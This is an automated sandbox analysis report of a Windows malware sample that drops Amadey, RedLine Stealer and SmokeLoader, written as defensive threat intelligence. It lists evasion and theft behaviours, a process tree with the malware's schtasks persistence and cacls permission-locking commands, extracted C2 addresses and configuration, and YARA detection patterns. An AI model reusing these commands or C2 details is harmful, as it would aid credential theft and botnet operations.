Edit tour

Windows Analysis Report
q4B165cujP.exe

Overview

General Information

Sample Name:	q4B165cujP.exe
Original Sample Name:	1a2b0ab54afd2bae94b94b2d8bb128fc.exe
Analysis ID:	1280728
MD5:	1a2b0ab54afd2bae94b94b2d8bb128fc
SHA1:	bfcab4e5dc06bef8d07c82e6e5e49e194fed1146
SHA256:	0ee0b5d6e07273ce4ecc3cc47e76c58075d06380ee210c715f526d035365f221
Tags:	exeRedLineStealer
Infos:

Detection

Amadey, RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Amadeys Clipper DLL

Maps a DLL or memory area into another process

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Machine Learning detection for sample

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

PE file does not import any functions

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

File is packed with WinRar

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

q4B165cujP.exe (PID: 5584 cmdline: C:\Users\user\Desktop\q4B165cujP.exe MD5: 1A2B0AB54AFD2BAE94B94B2D8BB128FC)

explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

6F2B.exe (PID: 5796 cmdline: C:\Users\user\AppData\Local\Temp\6F2B.exe MD5: C2525C86E7015D51FD9034964B41FAE7)

x5587928.exe (PID: 5700 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe MD5: E0110D68A72C0533529AD08E05CBC2BC)

g6604988.exe (PID: 4744 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe MD5: AEA234064483F651010CF9D981F59FEA)

pdates.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" MD5: AEA234064483F651010CF9D981F59FEA)

schtasks.exe (PID: 1308 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5600 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "user:N"&&CACLS "pdates.exe" /P "user:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "user:N"&&CACLS "..\925e7e99c5" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2152 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 4424 cmdline: CACLS "pdates.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 4204 cmdline: CACLS "pdates.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 3204 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 6888 cmdline: CACLS "..\925e7e99c5" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 6556 cmdline: CACLS "..\925e7e99c5" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

rundll32.exe (PID: 6784 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

h1931339.exe (PID: 5116 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

j8994074.exe (PID: 6840 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe MD5: E12039830693787EDB24E96255488216)

D217.exe (PID: 4696 cmdline: C:\Users\user\AppData\Local\Temp\D217.exe MD5: DD48A8AB0415034524EFC0AB82A32106)

y4910383.exe (PID: 5428 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe MD5: 0B98CC363FAFDAAC610709394C959F05)

k4215493.exe (PID: 6936 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

l2956268.exe (PID: 5184 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe MD5: AEA234064483F651010CF9D981F59FEA)

pdates.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" MD5: AEA234064483F651010CF9D981F59FEA)

n7660022.exe (PID: 6980 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe MD5: A29812C26E88DF3CCEACCC0A46F42396)

3448.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\3448.exe MD5: 691A54B032D616E5F9303557FFD49ADD)

ohcompetitive.exe (PID: 2552 cmdline: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe MD5: 0D017F7F9508AE53DE2A266572B33B99)

ohcompetitive.exe (PID: 6552 cmdline: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe MD5: 0D017F7F9508AE53DE2A266572B33B99)

ohcompettitive.exe (PID: 5184 cmdline: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe MD5: 4D5F7960D715A6C04F1388FB49521F81)

B29C.exe (PID: 5596 cmdline: C:\Users\user\AppData\Local\Temp\B29C.exe MD5: 929515C08EFDD71249F12EF92966A0AD)

control.exe (PID: 7060 cmdline: "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL", MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

rundll32.exe (PID: 7028 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL", MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6564 cmdline: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL", MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4904 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL", MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

jfshvii (PID: 5432 cmdline: C:\Users\user\AppData\Roaming\jfshvii MD5: 1A2B0AB54AFD2BAE94B94B2D8BB128FC)

pdates.exe (PID: 4976 cmdline: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe MD5: AEA234064483F651010CF9D981F59FEA)

pdates.exe (PID: 4548 cmdline: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe MD5: AEA234064483F651010CF9D981F59FEA)

pdates.exe (PID: 6696 cmdline: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe MD5: AEA234064483F651010CF9D981F59FEA)

pdates.exe (PID: 5620 cmdline: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe MD5: AEA234064483F651010CF9D981F59FEA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: Amadey

{"C2 url": "77.91.68.61/rock/index.php", "Version": "3.86"}

Threatname: RedLine

{"C2 url": ["77.91.124.84:19071"], "Bot Id": "lande", "Authorization Header": "9fa41701c47df37786234f3373f21208"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://77.91.68.29/fks/", "http://77.91.68.29/fks/"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
q4B165cujP.exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\jfshvii	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a08:$pat14: , CommandLine: 0x19d8c:$v2_1: ListOfProcesses 0x19b68:$v4_3: base64str 0x1a9c5:$v4_4: stringKey 0x17fc5:$v4_5: BytesToStringConverted 0x1708b:$v4_6: FromBase64 0x18529:$v4_8: procName
C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a08:$pat14: , CommandLine: 0x19d8c:$v2_1: ListOfProcesses 0x19b68:$v4_3: base64str 0x1a9c5:$v4_4: stringKey 0x17fc5:$v4_5: BytesToStringConverted 0x1708b:$v4_6: FromBase64 0x18529:$v4_8: procName
C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001C.00000000.481478522.00000000007A2000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000001A.00000002.908661620.000000006E801000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000D.00000002.786519380.00000000079A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x9a60:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e60:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1c4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1c4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5c4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5c4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.726837895.0000000003314000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.726837895.000000000325B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0000000D.00000002.754662860.0000000004101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6a40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
Process Memory Space: pdates.exe PID: 6940	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: ohcompetitive.exe PID: 2552	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: j8994074.exe PID: 6840	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: j8994074.exe PID: 6840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: n7660022.exe PID: 6980	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: n7660022.exe PID: 6980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 62 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
40.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
4.0.jfshvii.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.2.ohcompetitive.exe.4296d10.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
22.2.l2956268.exe.af0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
